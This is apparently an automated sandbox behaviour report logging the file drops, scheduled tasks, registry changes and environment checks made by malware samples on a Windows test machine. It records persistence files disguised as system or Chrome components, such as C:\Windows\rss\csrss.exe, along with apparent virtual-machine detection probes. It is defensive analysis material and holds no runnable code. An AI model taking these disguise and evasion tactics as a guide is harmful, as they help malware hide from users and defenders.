File created C:\Program Files (x86)\MyBurn\is-CGEMO.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-BS88N.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files (x86)\MyBurn\is-46UPJ.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-7AQ09.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-4M76Q.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\MyBurn\is-MIOMF.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\C135.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20231025045428.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "404371473" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5E7EC351-72F2-11EE-AA96-FAD03DFA5361} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3051452fff06da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e900000000020000000000106600000001000020000000aa5b9f696d6d5fadb6817a257c6a3d0eca49a6716636fb7bf2c38cb484080a27000000000e8000000002000020000000868fd7d5982d340fd5acd890d1b6de0f55f4a1d62547f6d9ee509f476889464e90000000859600b860a5d568fa742b4f9be8c68b177187b395f88c5f01e9572b7e00f9f1e094efb57e22faf6b8dfd265ee27d9403944e16d7d2ab6e77c9bc67fcaf04ecab61f7f668bdbbe4ad0fdc7c0ac1c9263261724b8629cc08e935cb6e810d69893722a6a75fb8b88f3697776ae2e573207cb3cebbfbe3e7d45221b14b8b406deb57d139cdbc229d172653ce0cbf74590b440000000042b6c1fecacf22ddecc2efb9a629e667cc36ce571967fa26bd98085049221621d450844d920064dda52106eaf4440e7a59e1e227971db2a654383b7b1004747 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e900000000020000000000106600000001000020000000367ee104ed536bb448f47b601ef76cf839da892c271190f56cc4fb3e867c3774000000000e800000000200002000000074398a88d02a4ad4016d8329eba7549175b9f80755f8e3785ed798daea38fc42200000003e96ed12466fd7ad49d843b48c98cd346a6a94772812af09f8f10f5655181fe7400000004ed862f05009a332b5941bdc06d835dcd3a32d4098bcd177bb086f1523c153cc6fe0d45080e74eddfc1ed0769f89782ec292bcf8164cfe582bf8cd82042ffcc6 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
